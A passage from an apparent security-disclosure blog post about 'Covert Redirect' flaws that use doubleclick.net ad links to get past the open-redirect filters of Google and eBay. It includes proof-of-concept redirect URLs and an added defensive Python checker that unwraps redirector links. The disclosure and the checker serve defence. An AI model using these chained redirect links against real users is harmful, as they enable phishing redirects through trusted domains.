CSRF, Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage, Denial of Service, File Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML Injection, Spam. It also publishes suggestions, advisories, and solution details related to Open Redirect vulnerabilities and cyber intelligence recommendations.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(3) Google DoubleClick.net Can Adversely Affect Other Websites.</b></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">At the same time, Google DoubleClick.net can be used to perform "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" on other websites, such as Google, eBay, The New York Times, etc. (bypassing other websites' Open Redirect filters).</span></div>
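<div><span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">A redirect filter that trusts doubleclick.net by host name alone accepts the clk and pixel links listed under "Vulnerable URLs 2" and "Vulnerable URLs 3"; the added example below (not code from the original post or from Google) unwraps the destination carried inside those two link shapes and checks it as well. The allowlist, the function names and the fail-closed policy are assumptions made for illustration.</span></div>

```python
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumptions for this example: the hosts a site accepts as final redirect
# destinations, and the third-party redirector its filter also lets through.
# ALLOWED must not list redirector hosts, or the fail-closed rule is lost.
ALLOWED = {"google.com"}
REDIRECTORS = {"doubleclick.net"}

# Sample inputs: the links quoted on this page.
CLK_LISTED = "http://ad.doubleclick.net/clk;275260754;102106837;b?http://zerodistance.cio.com"
CLK_POC = "http://ad.doubleclick.net/clk;275260754;102106837;b?http://www.inzeed.com/kaleidoscope/"
PIXEL_LISTED = ("http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc"
                "&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http%3A%2F%2Fib.adnxs.com")
PIXEL_POC = ("http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc"
             "&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http://www.tetraph.com/security")


def host_of(url):
    """Lower-cased host of an absolute or scheme-relative URL, or '' if none."""
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:
        return ""


def in_domains(host, domains):
    """True if host equals, or is a subdomain of, one of the domains."""
    # The leading dot matters: a bare endswith("google.com") would also
    # accept "notgoogle.com".
    return any(host == d or host.endswith("." + d) for d in domains)


def embedded_destination(url):
    """Destination carried inside a redirector link, or None.

    Covers only the two link shapes listed on this page:
      /clk;<id>;<id>;<flag>?<destination>   (whole query string is the URL)
      /pixel?...&forward=<destination>
    """
    if not in_domains(host_of(url), REDIRECTORS):
        return None
    parts = urlsplit(url)
    if parts.path.startswith("/clk;"):
        return unquote(parts.query) or None
    if parts.path == "/pixel":
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == "forward":
                return value or None
    return None


def final_destination(url, max_hops=5):
    """Unwrap nested redirector links (no network access) to the last URL."""
    for _ in range(max_hops):
        nxt = embedded_destination(url)
        if nxt is None:
            return url
        url = nxt
    return url


def naive_check(target, allowed=ALLOWED):
    """Filter that looks only at the host of the redirect target."""
    return in_domains(host_of(target), allowed | REDIRECTORS)


def strict_check(target, allowed=ALLOWED):
    """Host check that also validates the destination inside a redirector link."""
    host = host_of(target)
    if in_domains(host, REDIRECTORS):
        # Fail closed: an unrecognised link shape on a redirector host, or a
        # chain longer than max_hops, leaves the result on the redirector
        # itself, which is not in `allowed`.
        return in_domains(host_of(final_destination(target)), allowed)
    return in_domains(host, allowed)


if __name__ == "__main__":
    for link in (CLK_LISTED, CLK_POC, PIXEL_LISTED, PIXEL_POC):
        print(host_of(final_destination(link)),
              "naive:", naive_check(link), "strict:", strict_check(link))
```
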
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.1) </b></span><b>Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net</b></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Domain:</b></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">google.com</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"Google is an American multinational technology company specializing in Internet-related services and products. These include online advertising technologies, search, cloud computing, and software. Most of its profits are derived from AdWords, an online advertising service that places advertising near the list of search results. Google was founded by Larry Page and Sergey Brin while they were Ph.D. students at Stanford University. Together they own about 14 percent of its shares but control 56 percent of the stockholder voting power through supervoting stock. They incorporated Google as a privately held company on September 4, 1998. An initial public offering followed on August 19, 2004. Its mission statement from the outset was "to organize the world's information and make it universally accessible and useful," and its unofficial slogan was "Don't be evil". In 2004, Google moved to its new headquarters in Mountain View, California, nicknamed the Googleplex. The corporation has been estimated to run more than one million servers in data centers around the world (as of 2007). It processes over one billion search requests and about 24 petabytes of user-generated data each day (as of 2009). In December 2013, Alexa listed google.com as the most visited website in the world. Numerous Google sites in other languages figure in the top one hundred, as do several other Google-owned sites such as YouTube and Blogger. Its market dominance has led to prominent media coverage, including criticism of the company over issues such as search neutrality, copyright, censorship, and privacy." (Wikipedia)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/Logout?service=<wbr></wbr>writely&continue=https://<wbr></wbr>google.com/</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fsecurity" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/Logout?service=wise&<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.tetraph.<wbr></wbr>com%2Fsecurity</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=btuSq89khcQ&feature=youtu.be</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://computerobsess.<wbr></wbr>blogspot.com/2014/11/google-<wbr></wbr>covert-redirect-vulnerability.<wbr></wbr>html</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.2) </b></span><b>eBay Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net</b></span><br />
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Domain:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">ebay.com</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"eBay Inc. (stylized as ebay) is an American multinational corporation and e-commerce company, providing consumer to consumer & business to consumer sales services via Internet. It is headquartered in San Jose, California, United States. eBay was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble. Today, it is a multi-billion dollar business with operations localized in over thirty countries. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to its auction-style sales, the website has since expanded to include "Buy It Now" shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); online classified advertisements (via Kijiji or eBay Classifieds); online event ticket trading (via StubHub); online money transfers (via PayPal) and other services. It is not a free website, but charges users an invoice fee when sellers have sold or listed any items." (Wikipedia)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/" style="background-color: white;" target="_blank">http://rover.ebay.com/rover/1/<wbr></wbr>711-67261-24966-0/2?mtid=691&<wbr></wbr>kwid=1&crlp=1_263602&itemid=<wbr></wbr>370825182102&mpre=http://<wbr></wbr>googleads.g.doubleclick.net/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV%26num=0%26sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ%26client=ca-pub-0466582109566532%26adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://rover.ebay.com/rover/1/<wbr></wbr>711-67261-24966-0/2?mtid=691&<wbr></wbr>kwid=1&crlp=1_263602&itemid=<wbr></wbr>370825182102&mpre=http://<wbr></wbr>googleads.g.doubleclick.net/<wbr></wbr>aclk?sa=L%26ai=C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV%<wbr></wbr>26num=0%26sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ%<wbr></wbr>26client=ca-pub-<wbr></wbr>0466582109566532%26adurl=http:<wbr></wbr>//www.tetraph.com/security</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
